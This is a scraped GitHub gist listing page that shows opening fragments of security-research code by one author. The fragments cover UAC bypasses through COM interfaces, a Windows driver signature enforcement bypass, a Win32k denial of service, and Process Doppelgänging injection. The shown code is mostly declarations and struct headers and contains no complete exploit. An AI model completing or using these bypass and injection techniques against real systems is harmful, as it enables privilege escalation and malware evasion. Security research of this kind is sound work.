Skip to content

Instantly share code, notes, and snippets.

View gist:c5d427a6e3b67ed70ede9d34def329a2
akagi (uacme)
akatsuki (uacme)
aoba (dsefix)
fubuki (uacme)
furutaka (tdl)
harasume (zeroaccess)
hibiki (uacme)
ikazuchi (uacme)
inazuma (uacme)
isonami (sxsexp)
View gist:9c3120f630241304699ecd7d93446d5f
#define BITLOCKER_SIGNATURE "-FVE-FS-"
#define BITLOCKER_SIGNATURE_SIZE sizeof(BITLOCKER_SIGNATURE)
#pragma pack(push,1)
typedef struct _FVEFS_BOOT_RECORD {
BYTE JumpCode[3]; //+0x0
BYTE Signature[8]; //+0x3
WORD SectorSize; //+0xB
BYTE SectorsPerCluster; //+0xD
WORD ReservedClusters; //+0xE
View gist:59c689a14f1fc2302d858ae0aa3f6b86
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
@hfiref0x
hfiref0x / main.c
Last active Aug 20, 2020
NtLoadEnclaveData Windows 10 RS3 DSE bypass
View main.c
// Original source link https://twitter.com/hFireF0X/status/887930221466443776
// If you are here from any other link - do know that they just steal original info without giving any credit to source
// This bug has been fixed in 16273 public build.
#include "global.h"
HINSTANCE g_hInstance;
HANDLE g_ConOut = NULL;
BOOL g_ConsoleOutput = FALSE;
WCHAR g_BE = 0xFEFF;
@hfiref0x
hfiref0x / akagi_41.c
Created Aug 16, 2017
UAC bypass using CMSTPLUA COM interface
View akagi_41.c
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@hfiref0x
hfiref0x / akagi_42b.c
Last active Mar 5, 2021
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
View akagi_42b.c
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@hfiref0x
hfiref0x / NtUserOpenDesktop.c
Created Nov 29, 2017
Win32k NtUserOpenDesktop Denial Of Service (9200-17046)
View NtUserOpenDesktop.c
/*
Win32k NtUserOpenDesktop->OpenDesktop Denial Of Service feature.
Working range: x64 Windows 8 (9200) up to Windows 10 RS4 (17046).
x86 versions not tested.
Feature:
@hfiref0x
hfiref0x / inject.c
Last active Apr 14, 2021
Process Doppelgänging
View inject.c
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
// Vyacheslav Rusakov @swwwolf
// Tom Bonner @thomas_bonner
//
#include <Windows.h>
@hfiref0x
hfiref0x / temp.c
Created Jul 24, 2018
DCDv1 unpack
View temp.c
#include <Windows.h>
#include <msdelta.h>
#pragma comment(lib, "msdelta.lib")
BOOL load_file(LPCTSTR FileName, LPDWORD BytesRead, LPVOID *AllocatedBuffer)
{
HANDLE f;
LARGE_INTEGER fsz;
LPVOID buffer = NULL;
@hfiref0x
hfiref0x / akagi_49a.c
Created Aug 23, 2018
UAC bypass using CreateNewLink COM interface
View akagi_49a.c
typedef struct tagCREATELINKDATA {
ULONG dwFlags;
WCHAR szLinkName[MAX_PATH]; // + 0x20C
WCHAR szExeName[MAX_PATH]; // + 0x414
WCHAR szParams[MAX_PATH]; // + 0x61C
WCHAR szWorkingDir[MAX_PATH]; // + 0x824
WCHAR szOriginalName[MAX_PATH]; // + 0xA2C
WCHAR szExpExeName[MAX_PATH]; // + 0xC34
WCHAR szProgDesc[MAX_PATH]; // + 0xE3C
WCHAR szFolder[MAX_PATH]; // + 0x1044